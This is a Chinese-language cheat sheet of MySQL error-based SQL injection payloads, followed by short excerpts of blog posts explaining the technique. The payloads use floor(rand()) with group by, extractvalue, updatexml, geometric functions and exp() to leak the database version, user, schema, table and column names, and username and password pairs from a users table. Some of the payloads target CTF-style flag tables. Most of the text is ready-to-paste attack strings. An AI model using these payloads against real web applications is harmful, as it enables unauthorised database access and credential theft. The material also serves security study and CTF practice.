固定語句公式假如id輸入存在注入的話,可以通過如下語句進行報錯。union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆資料語句))a from information_schema.tables group by a)b
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);可以看到成功爆出了mysql的版本error 1062 (23000): duplicate entry 』5.1.33-community-log1′ for key 1
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select distinct concat(0x7e,0x27,schema_name,0x27,0x7e)+from+information_schema.schemata+limit+0,1))a+from information_schema.tables+group+by+a)b
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+column_name+from+information_schema.columns+where+table_name=表名+limit+0,1))a+from+information_schema.tables+group+by+a)b
union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,欄位1,0x3a,欄位2)+from+表名+limit+0,1))a+from+information_schema.tables+group+by+a)b
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e, (select user()),0x7e))
and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e))
and extractvalue(1, concat(0x7e, (select column_name from information_schema.columns where table_name=0x666c6167 limit 1,1),0x7e))
and extractvalue(1, concat(0x7e,(select distinct concat(0x23,id,0x3a,flag,0x23) from flag limit 0,1)))
and updatexml(1,concat(0x7e,version(),user(),0x7e),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)
and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),0x7e),1)
and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e,(select password from users limit 1,1),0x7e),1)
and geometrycollection((select * from(select * from(select user())a)b));
and multipoint((select * from(select * from(select user())a)b));
and polygon((select * from(select * from(select user())a)b));
and multipolygon((select * from(select * from(select user())a)b));
and linestring((select * from(select * from(select user())a)b));
and multilinestring((select * from(select * from(select user())a)b));
and exp(~(select * from(select user())a));
SQL注入之報錯注入
0x01 報錯注入 在實際場景中,沒有乙個資料的返回資訊點。此時需要用報錯注入使其顯示出注入資訊。使用到報錯注入的場景有 普通報錯注入,即沒有資料返回點 insert注入 update注入 delete注入 0x02 常用到的兩個報錯函式 updatexml 和extractvalue 函式 0x0...
SQL注入之報錯型注入
一般是在頁面沒有顯示位 但用echo mysql error 輸出了錯誤資訊的時候使用,它的特點是注入速度快,但是語句較複雜,不能用group concat 只能用limit依次猜解 count rand group by三者缺一不可 報錯注入用乙個公式,只要套用公式即可,公式如下 id 2 and...
SQL注入 報錯注入
乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...